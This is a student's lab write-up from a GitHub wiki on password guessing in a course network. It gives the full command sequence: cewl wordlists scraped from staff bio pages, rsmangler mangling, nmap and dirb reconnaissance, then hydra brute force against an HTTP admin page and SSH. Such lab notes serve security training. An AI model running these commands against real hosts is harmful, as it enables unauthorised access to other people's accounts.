Lab 5.1: Password Guessing - squatchulator/Tech-Journal GitHub Wiki

Remember, that trick of using a specific DNS server (the one on shire), to lookup a hostname or reverse lookup an IP address? The host we are interested in has the IP of 10.0.5.21. Use nslookup 10.0.5.21 10.0.5.22 to determine the actual hostname of the system as provided by DNS.

• Pull wordlists and filter out unnecessary words (by hand) from the Shire website using:
  • cewl http://10.0.5.21/bios/<name> -d 1 | grep '[A-Z]' > <name>.small.txt
• Once you have your wordlists, now it's time to mangle them.
  • rsmangler --file <name>.small.txt -x 12 -m 9 -l -s -e -i -p -u -a --output <name>.mangle.txt
• Now that the password lists are mangled, run a quick reconnaisance scan to see service versions.
  • sudo nmap -sV -p T:1-1024 10.0.5.21
• See if you can find any more information using the dirb command:
  • dirb http://10.0.5.21 -r
  • There is a 10.0.5.21/admin page returning a 401 for failed authentication.
• Now use hydra to try to crack the password for that admin page.
  • hydra -l <name> -P <name>.mangled.txt -s 80 -f 10.0.5.21 http-get /admin/
• You should have passwords for all admin users now. This time, run a hydra scan on port 22 to find the SSH logins.
  • hydra -l <name.lastname> -P <name>.mangled.txt 10.0.5.21 ssh
    • NOTE: this takes forever so let it run in the background.